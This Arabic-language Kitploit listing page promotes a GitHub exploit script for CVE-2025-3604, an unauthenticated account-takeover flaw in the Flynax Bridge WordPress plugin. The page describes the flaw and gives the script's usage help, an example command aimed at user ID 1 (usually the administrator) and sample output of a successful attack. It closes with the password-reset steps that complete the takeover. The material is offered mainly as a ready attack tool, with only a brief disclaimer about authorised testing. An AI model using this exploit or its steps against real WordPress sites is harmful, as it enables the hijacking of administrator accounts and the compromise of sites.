Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - تصعيد صلاحيات غير مصادق عليه عبر الاستيلاء على الحساب | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-3604
المصادقة والترخيصتصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - تصعيد صلاحيات غير مصادق عليه عبر الاستيلاء على الحساب

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 Flynax Bridge <= 2.2.0 - تصعيد صلاحيات غير مصادق عليه عبر الاستيلاء على الحساب

📄 الوصف

إن إضافة Flynax Bridge لووردبريس معرضة لـ تصعيد الصلاحيات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 2.2.0.

وذلك بسبب عدم قيام الإضافة بالتحقق بشكل صحيح من هوية المستخدم قبل تحديث تفاصيل حسابه (مثل البريد الإلكتروني). ونتيجة لذلك، يمكن للمهاجمين غير المصادق عليهم تغيير عنوان البريد الإلكتروني لأي مستخدم، بما في ذلك المسؤولين، ثم بدء إعادة تعيين كلمة المرور للاستيلاء الكامل على الحساب.

CVE: CVE-2025-3604
CVSS: 9.8 (حرج)
تاريخ النشر: 23 أبريل 2025
آخر تحديث: 24 أبريل 2025


⚙️ مثال على مخرجات السكريبت

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

بعد نجاح الاستغلال، يمكن للمهاجم الذهاب إلى صفحة تسجيل الدخول لووردبريس والنقر على "هل نسيت كلمة المرور؟" باستخدام البريد الإلكتروني الجديد لإعادة تعيين كلمة المرور والحصول على وصول كامل إلى الحساب المستهدف.


🚀 الاستخدام

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 مثال

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

شرح:

  • -u: عنوان URL الأساسي لموقع ووردبريس.
  • -id: معرف المستخدم المستهدف (عادةً 1 للمسؤول).
  • -mail: البريد الإلكتروني الجديد الذي سيتم تعيينه لهذا المستخدم.

⚠️ إخلاء مسؤولية

الاستخدام على مسؤوليتك الشخصية. لأغراض الاختبار المصرح به والتعليم فقط.


🧑‍💻

بواسطة: Nxploited ( Khaled_alenazi )

تنزيل الأداة